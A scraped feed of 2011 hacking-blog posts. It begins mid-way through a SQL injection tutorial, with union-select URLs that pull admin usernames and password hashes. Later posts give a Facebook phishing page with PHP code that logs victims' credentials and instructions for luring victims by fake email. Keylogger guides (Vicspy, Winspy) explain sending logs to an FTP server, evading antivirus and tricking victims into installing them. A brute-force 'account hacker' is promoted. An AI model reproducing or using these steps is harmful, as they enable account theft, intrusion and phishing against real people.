<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--</code> </span></span><br />
<span style="font-size: small;"><span> This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> For this tutorial, we will be using the table name of "admin".</span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span></span></span> <div align="justify"> </div><span style="font-size: small;"><span><span style="color: red;"><span>Step 5: View the Columns, and Find the Fucking Crucial Shit</span></span> </span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span> Here comes the fun part :3</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> To find the column names, add this to the end of the URL:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--</code> </span></span><br />
<span style="font-size: small;"><span> Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.</span></span><br />
<span style="font-size: small;"><span> Go <a href="http://adf.ly/20MDw" target="_blank"><span style="color: deepskyblue;"><span style="text-decoration: underline;">here</span></span></a></span> <span> and type in your table name where is says "Say Hello to My Little Friend".</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> In my case, this is the string that I got after I inputted "admin" to the input space:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>61646d696e</code> </span></span><br />
<span style="font-size: small;"><span> Now, replace the table name with hex as so:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--</code> </span></span><br />
<span style="font-size: small;"><span> Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..</code> </span></span><br />
<span style="font-size: small;"><span> Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--</code> </span></span></span><br />
<span style="font-size: small;"><span> The "0x3a" will put a colon to where the information will be separated. You should get something like this:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>1:MyName:e10adc3949ba59abbe56e057f20f883e</code> </span></span><br />
<span style="font-size: small;"><span> The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij <a href="http://adf.ly/20MDF" target="_blank">here</a></span> <span>.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Now as you can see. This is the login info:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>Username: MyName</code></span></span><br />
<span style="font-size: small;"><span><code> Pass: 123456</code> </span></span><br />
<span style="font-size: small;"><span> Now all you have to do is find the admin page, which is usually </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/admin</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/adminlogin</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/admin_login</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/login</code></span></span><br />
<span style="font-size: small;"><span> or something similar. There are tools online that will find you the admin page.</span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span></span><span>Download Havij <a href="http://adf.ly/20MDF" target="_blank">here</a></span><span></span></span>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com4tag:blogger.com,1999:blog-7264560992458786351.post-12843326914078327062011-07-16T07:01:00.000-07:002011-07-16T07:01:42.161-07:00Zynga Poker Bot 2011+Zynga hacking secrets(Facebook, MySpace, Twitter, Bebo, etc)<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSHSUkkDobaZsfSvRQzGJXIsVRUzktTBSjM2ff2f8e51rBXok7sVIYj6Cez5cGZcdc80UT8vI5CTyfC4HqyTXvW3hAcRSq5PKr26IXnJTTIIAF02-7_YIuZd6hTef0NngsM3yfZc8J60xb/s320/Zynga+Poker+Texas+Holdem+Cheats.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSHSUkkDobaZsfSvRQzGJXIsVRUzktTBSjM2ff2f8e51rBXok7sVIYj6Cez5cGZcdc80UT8vI5CTyfC4HqyTXvW3hAcRSq5PKr26IXnJTTIIAF02-7_YIuZd6hTef0NngsM3yfZc8J60xb/s200/Zynga+Poker+Texas+Holdem+Cheats.jpg" width="200" /></a></div><div align="justify"> Zynga Poker Bot 2011 is a program written in AutoIT which attempts to fully automate the process of playing texas holdem poker on Zynga (Facebook, MySpace, Twitter, Bebo, etc).<br />
<br />
Scammer Notice<br />
This is 100% FREE, Open Source software!<br />
If you paid for this software you have been scammed. You should contact the person who has sold the software inform them that they are violating the GNU GPL3 license and that you are entitled to a full refund.<br />
<br />
Features<br />
-Works on the Zynga Games Network (Facebook, MySpace, Twitter, Bebo, etc).<br />
-100% automated, joins tables, closes popups, reloads when stuck.<br />
-Full SourceCode available to download.<br />
-Works in any size table with any bankroll.<br />
-Plays the best hands, and then calculates odds to make decisions.<br />
-Allows custom PlayerProfiles.<br />
-Table hop if too few opponents.<br />
-Table hop if the blinds are too big or too small.<br />
-Allows custom user image.<br />
-Detects number of opponents.<br />
-Run multiple BackgroundBots.<br />
-Artificial Intelligence Features<br />
-Works with 48+ Poker Rooms<br />
-Learning from mistakes<br />
-Easy-to-use: Graphical user interface<br />
-100% Undetectable by the poker rooms<br />
-Support No Limit and Fixed Limit Games<br />
-Support ring games, tournaments and sit and go’s<br />
-Works with real-money and play-money games<br />
-Configurable to your own playing preferences</div><br />
<div class="header">Notes for File Types of shared files:</div><b>RAR:</b><div align="justify"> RAR is a proprietary file format for data compression and archiving. RAR compression operations are typically slower than compressing the same data with ZIP, but a much better rate of compression is achieved whenever the data can still be compressed further. Apart from the excellent rate of compression, RAR has several other features not previously found in many other archive formats, which has contributed greatly to its popularity.</div><div align="justify"><br />
</div><div align="justify">Download </div><a href="http://adf.ly/1FBOU"><span style="color: limegreen;"><b>Click Here</b></span></a>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com2tag:blogger.com,1999:blog-7264560992458786351.post-10046545474041380672011-07-16T06:59:00.000-07:002011-07-16T06:59:23.836-07:00Facebook Phishing Tutorial<div class="post_body"> <span class="postbody">Today we are going to make a phisher for facebook. </span><br />
1) go to facebook, and view the source, copy all the text to notepad. <br />
2) we need to change some codes so press: Control + F <br />
3) search for action <br />
4) You should get: action=www.facebook.com/login and bla bla bla <br />
5) delete all the <a class="external" href="http://facebook.com/" rel="nofollow">facebook.com</a> crap, and put: lol.php <br />
6) beside action you will see something saying: method=post <br />
7) change "post” to "get” save the file, name it: index.php and save it to desktop but remember! where it says: "save as type” change it to "all files” this is very important <br />
9) make a new file in notepad, and put this code: <br />
header(”Location: <a class="previewlink" href="http://www.facebook.com/login.php" rel="nofollow">http://www.Facebook.com/login.php</a> "); <br />
$handle = fopen(”passwords.txt”, "a”); <br />
foreach($_GET as $variable => $value) { <br />
fwrite($handle, $variable); <br />
fwrite($handle, "=”); <br />
fwrite($handle, $value); <br />
fwrite($handle, "\r\n”); <br />
} <br />
fwrite($handle, "\r\n”); <br />
fclose($handle); <br />
exit; <br />
?> <br />
10) now save it as lol.php and remember the save as file type to all files. <br />
11) now, make a new file in notepad, dont write anything, save it as: passwords.txt <br />
12) now upload all of them in <a class="previewlink" href="http://www.t35.com/" rel="nofollow">www.t35.com</a> <br />
<br />
</div>Well... there are many out there. But, I would recommend you following webhosts:<br />
<br />
a. www.esmartstart.com<br />
b. www.drivehq.com<br />
c. www.110mb.com<br />
d. www.t35.com<br />
<br />
<span style="color: red; font-weight: bold;">Update:</span> Check out newer one:<br />
e. www.yourfreehosting.net<br />
<br />
The Phisher Creator file is zipped and password protected. <br />
<br />
And yes, if you're getting error while extracting zip file, it means you are not entering password correctly. Password is same as I have mentioned. Enter it carefully and you will surely extract the software.<br />
<br />
<h3>8. How do I send Phisher link to victim???</h3><br />
Get the Anonymous Emailer and create a fake email and post the phisher link in this email. Ask victim to login to his account using this link.<br />
<br />
<br />
<div style="text-align: center;"><img alt="" src="http://cyberworlds.at.ua/emaill/Phisherlink.jpg" /></div>I received many questions like this. I helped many readers and finally reached conclusion that most of them were not reading my article completely and carefully. So, <span style="font-weight: bold;">read article completely and carefully.</span> This is most common error made by readers.<br />
<br />
Thats it. I hope now, you will have most of your doubts about Phishing cleared. This article is meant only for you. If you still have problems in using <em>Phishing to hack email passwords,</em> don't hesitate to ask me in comments.<br />
<br />
Enjoy Phishing to hack email password... <br />
<br />
<br />
<a href="http://adf.ly/1GbcG" title="Phish Creator"><img alt="" height="63" src="http://cyberworlds.at.ua/download/donlod.jpeg" width="63" /></a>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-22906603628660037842011-07-16T06:55:00.000-07:002011-07-16T06:55:49.504-07:00Hack Yahoo, Hotmail, Myspace, MSN Account Passwords<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQhEtcnFi2-WFsQdLglBIEnAmVGD_5cLDQcY7IYPwIYd2OT-Y1JF2cCT2xNlO81p1R-yLuXE_QKPDh3JPB4U-YyyXuwzSyyj9LqlEKfM8H5f4ngZmmhZ3UZNBGERXG3lH9KtZ1xS4c-bQ/s400/MSN_logohacked.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQhEtcnFi2-WFsQdLglBIEnAmVGD_5cLDQcY7IYPwIYd2OT-Y1JF2cCT2xNlO81p1R-yLuXE_QKPDh3JPB4U-YyyXuwzSyyj9LqlEKfM8H5f4ngZmmhZ3UZNBGERXG3lH9KtZ1xS4c-bQ/s200/MSN_logohacked.gif" width="200" /></a></div><div style="color: black; text-align: justify;"></div><div align="justify"><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span>Hello Friends here is One More tutorial about <span><span>hacking </span></span></span></span></b><b><span><span style="line-height: 22px;"><span><span7869097><a href="javascript:void(0);" id="Y7869097S0" style="text-decoration: underline;">Facebook</a></span7869097></span> , Hotmail ,Yahoo ,Gmail ,<span7869097><a href="javascript:void(0);" id="Y7869097S1" style="text-decoration: underline;">Twitter</a></span7869097> ,</span></span></b><b><span><span style="line-height: 22px;"><span>orkut ,</span></span></span></b><b><span><span style="line-height: 22px;">myspace</span></span></b><b><span><span style="line-height: 22px;"><span></span></span></span></b><b><span><span style="line-height: 22px;"> and msn</span></span></b><b><span style="line-height: 22px;"><span><span></span> accounts with easy as 1 2 3 . In my previous article, I mentioned about Armadax <span>Key logger</span> for </span><span><span><span>Hacking Hotmail</span>, Yahoo, Myspace and Msn account passwords.</span></span></span></b></span></span></div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span>Today i am Introducing a very effective key logger namely Vicspy key logger - the key logger that I found extremely Good and user-friendly for hacking hotmail, yahoo account passwords. I have provided link for <span>software download</span> and password ... So Enjoy and Let's Begin the Tutorial <br />
</span></span></b></span></span><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span><b><span><span style="line-height: 22px;">Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,</span></span></b><b><span><span style="line-height: 22px;"><span>orkut,</span></span></span></b><b><span><span style="line-height: 22px;">myspace</span></span></b><b><span><span style="line-height: 22px;"><span></span></span></span></b><b><span><span style="line-height: 22px;"> and msn Passwords</span></span></b><div><span><br />
</span></div><div><span><span>1.</span> Download</span><span></span><a href="http://adf.ly/356733/http://www.megaupload.com/?d=RMF6OSJ2"><span><span> Vicspy keylogger </span></span></a><span></span><span>for hacking Hotmail, Yahoo, msn ,myspace ,Face book And Gmail account passwords.</span></div></span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span><br />
</span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span><span><span>2. </span>Extract the Rar to obtain Vicspy keylogger.<br />
<br />
<span>3. </span>Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.</span></span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span><br />
</span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span></span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span><br />
</span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span><span>4.</span> Now, in Servers , fill in the <span>FTP <span7869097><a href="javascript:void(0);" id="Y7869097S5" style="text-decoration: underline;">server</a></span7869097></span> which you wanna use to receive logs from keylogger.<br />
<br />
Fill in ftp server as:</span></span></b></span></span></div><div><span style="font-size: small;"><span><b><span style="line-height: 22px;"><span>ftp://user:pass@ftp.example.com/logs/</span></span></b></span></span></div><span style="font-size: small;"><br />
</span><div><span style="font-size: small;"><span><span style="line-height: 22px;"><span>where:<br />
<span style="font-weight: bold;"># user</span>: your username at ftp server.<br />
<span style="font-weight: bold;"># pass</span>: your password.<br />
<span style="font-weight: bold;"># logs</span>: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.<br />
<span style="font-weight: bold;"># ftp.example.com</span> : your ftp server address. (eg: <a href="ftp://ftp.drivehq.com/" style="text-decoration: underline;" target="_blank" title="Linkification:
ftp://ftp.drivehq.com">ftp.drivehq.com</a> for drivehq ftp server)<br />
<br />
After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.<br />
<span><br />
5.</span> In Control, check "Melt" to make key logger evaporate after installation on victim computer.<br />
<br />
<span>6.</span> Additional Options included in Vicspy key logger are that you can<br />
- Change keylogger file icon<br />
- Bind key logger with another file to make it undetectable by victim.<br />
<br />
<span>7.</span> Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.</span></span></span></span></div><div><span style="font-size: small;"><span><span><span style="line-height: 22px;"><br />
</span></span></span></span></div><div><span style="font-size: small;"><span><span><span style="line-height: 22px;"><span>8.</span> Now, send this file to your victim and make him to install this binded keylogged file on his computer (Social engineering). You can crypt this keylogger file and then use Fake error message generator to make our key logger undetectable by antivirus.<br />
<br />
Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.</span></span></span></span></div><div><span style="font-size: small;"><span><span><span style="line-height: 22px;"><br />
</span></span></span></span></div><span style="font-size: small;"><span><span><span style="line-height: 22px;">That's ALL About Vicspy Key logger for hacking Facebook,hotmail,Yahoo,Gmail,Twitter,</span></span><span><span style="line-height: 22px;"><span>orkut,</span></span></span><span><span style="line-height: 22px;">myspace</span></span><span><span style="line-height: 22px;"><span></span></span></span></span><span><span style="line-height: 22px;"><span> and msn account passwords. Vicspy keylogger can also be used for hacking other <span>email account</span></span> passwords</span></span></span>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com2tag:blogger.com,1999:blog-7264560992458786351.post-61189631961618638172011-07-16T06:52:00.000-07:002011-07-16T06:52:15.730-07:00Facebook Account Hacker v 2.4<div class="separator" style="clear: both; text-align: center;"><a href="http://i83.servimg.com/u/f83/12/33/79/02/210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="http://i83.servimg.com/u/f83/12/33/79/02/210.jpg" width="200" /></a></div><div style="text-align: justify;"><span style="color: #00cfff;"><h2 class="title" style="color: black;"> <b>Facebook Account Hacker v 2.4</b> </h2><span class="post-icons" style="color: black;"> </span> <br style="color: black;" /><br style="color: black;" /><br style="color: black;" /><div align="justify"><span style="color: black; font-size: large;"><strong><span style="font-size: x-small;">Enter The Target E-Mail Address</span></strong></span><span style="color: black;">Type In A Number Of Password To Randomly Generate To Try To Hack The Facebook Account</span><br style="color: black;" /><span style="color: black;"> Uses The Facebook API To Quickly Enter Passwords And Bypass CAPTCHA</span><br />
<br />
<div align="center"><a href="http://adf.ly/1UqDa"><img height="85" src="http://www.techlearning.com/uploadedimages/Download_Now_button_blue.png" width="200" /></a></div></div></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-14184981907822042222011-07-16T06:49:00.000-07:002011-07-16T06:49:52.063-07:00Hack a Facebook password with winspy (Video)<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMibH_ZymdD6CLfvrmzvxFq1veB0K_tWj_F-1zl98oF-MtSnu2we3p1iK5chpF0NiWXSCFm2LZ6sQ85SZ02Jf7I1mAtsxLMPeq_JWzkJQfNxq5RtN0MTpo1ZKJLroL6AGCf6t6mR0brF0/s320/win-spy.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMibH_ZymdD6CLfvrmzvxFq1veB0K_tWj_F-1zl98oF-MtSnu2we3p1iK5chpF0NiWXSCFm2LZ6sQ85SZ02Jf7I1mAtsxLMPeq_JWzkJQfNxq5RtN0MTpo1ZKJLroL6AGCf6t6mR0brF0/s200/win-spy.jpg" width="200" /></a></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">I have made a couple of tutorials on winspy , but most <span class="IL_AD" id="IL_AD1">of the people</span> which are new to this subject failed to understand it,so therefore i am posting a video which will help you to </span></span><b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">hack a facebook password with a winspy <span4600023><a href="javascript:void(0);" id="Y4600023S0" style="color: #00f200; text-decoration: underline;">keylogger</a></span4600023>.</span></span></b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">Winspy keylogger is a complete stealth <span class="IL_AD" id="IL_AD3">mode</span> <span4600023><a href="javascript:void(0);" id="Y4600023S9" style="color: #00f200; text-decoration: underline;">spyware</a></span4600023> keylogger that will record both Local and <span class="IL_AD" id="IL_AD5">remote</span> computer.</span></span><br />
<b> </b><br />
<br />
<a href="" name="more"></a><br />
<br />
<div align="center"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><object height="385" width="430"><param name="movie" value="http://www.youtube.com/v/U1FSqA51wyE&color1=0xb1b1b1&color2=0xd0d0d0&hl=en_US&feature=player_detailpage&fs=1"><param name="allowFullScreen" value="true"><param name="allowScriptAccess" value="always"><embed src="http://www.youtube.com/v/U1FSqA51wyE&color1=0xb1b1b1&color2=0xd0d0d0&hl=en_US&feature=player_detailpage&fs=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="430" height="385"></object></span></span></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><b><br />
</b></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><b>Steps followed in the video:</b></span><br />
<br />
<br />
<br />
<div style="display: inline ! important;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">First of all download Winspy </span></span></span><span id="IL_AD7" style="font-style: normal ! important;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">keylogger software</span></span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> from link given below:</span></span></span></b></div></div></div></div></div><br />
<br />
<br />
<div style="color: #3d85c6;"><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div><div style="margin: 0px;"><div style="margin: 0px;"><b><a href="http://hop.clickbank.net/?rafay112/bccomp" linkindex="80" style="color: #e1771e; text-decoration: none;"><span class="Apple-style-span" style="color: #990000;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">Download Winspy Keylogger</span></span></span></span><img class="snap_preview_icon" id="snap_com_shot_link_icon" src="http://i.ixnp.com/images/v6.59/t.gif" style="background-color: transparent; background-image: url(http://i.ixnp.com/images/v6.59/theme/silver/palette.gif); background-position: -1128px 0pt; background-repeat: no-repeat; border: 0pt none; display: inline; float: none; font-family: "trebuchet ms",arial,helvetica,sans-serif; font-style: normal; font-weight: normal; height: 12px; left: auto; line-height: normal; margin: 0pt ! important; max-height: 2000px; max-width: 2000px; min-height: 0px; min-width: 0px; padding: 1px 0pt 0pt; position: static; text-decoration: none; top: auto; vertical-align: top; visibility: visible; width: 14px;" /></a></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">2. After downloading winspy keylogger to </span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><span class="IL_AD" id="IL_AD2">hack Facebook account</span> password</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run </span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.</span></span></span></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy <span class="IL_AD" id="IL_AD4">keylogger software</span>.</span></span></span></b></div></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"><b><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirqSo1vBFD7kvFwvRbT2UMrqgle3hh0SLVfgrKoit6fEs482yBueUwSyuDUxNJmsTQ5_jQ10jqlD1lD1mJwKg14E_gO3gNinuZLnKvIzMmp26cnzqhTQDqVmlzzqZwC1lkgpeXJZa3t1c/s1600-h/myspacehackingwinspykeylogger.jpg" imageanchor="1" style="color: #e1771e; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><img alt="Winspy
keylogger to hack gmail account password" border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirqSo1vBFD7kvFwvRbT2UMrqgle3hh0SLVfgrKoit6fEs482yBueUwSyuDUxNJmsTQ5_jQ10jqlD1lD1mJwKg14E_gO3gNinuZLnKvIzMmp26cnzqhTQDqVmlzzqZwC1lkgpeXJZa3t1c/s400/myspacehackingwinspykeylogger.jpg" style="border-style: none; border-width: 0px; padding: 4px;" width="400" /></span></span></span><img class="snap_preview_icon" id="snap_com_shot_link_icon" src="http://i.ixnp.com/images/v6.59/t.gif" style="background-color: transparent; background-image: url(http://i.ixnp.com/images/v6.59/theme/silver/palette.gif); background-position: -1128px 0pt; background-repeat: no-repeat; border: 0pt none; display: inline; float: none; font-family: "trebuchet ms",arial,helvetica,sans-serif; font-style: normal; font-weight: normal; height: 12px; left: auto; line-height: normal; margin: 0pt ! important; max-height: 2000px; max-width: 2000px; min-height: 0px; min-width: 0px; padding: 1px 0pt 0pt; position: static; text-decoration: none; top: auto; vertical-align: top; visibility: visible; width: 14px;" /></a></b></div><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div style="text-align: center;"><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
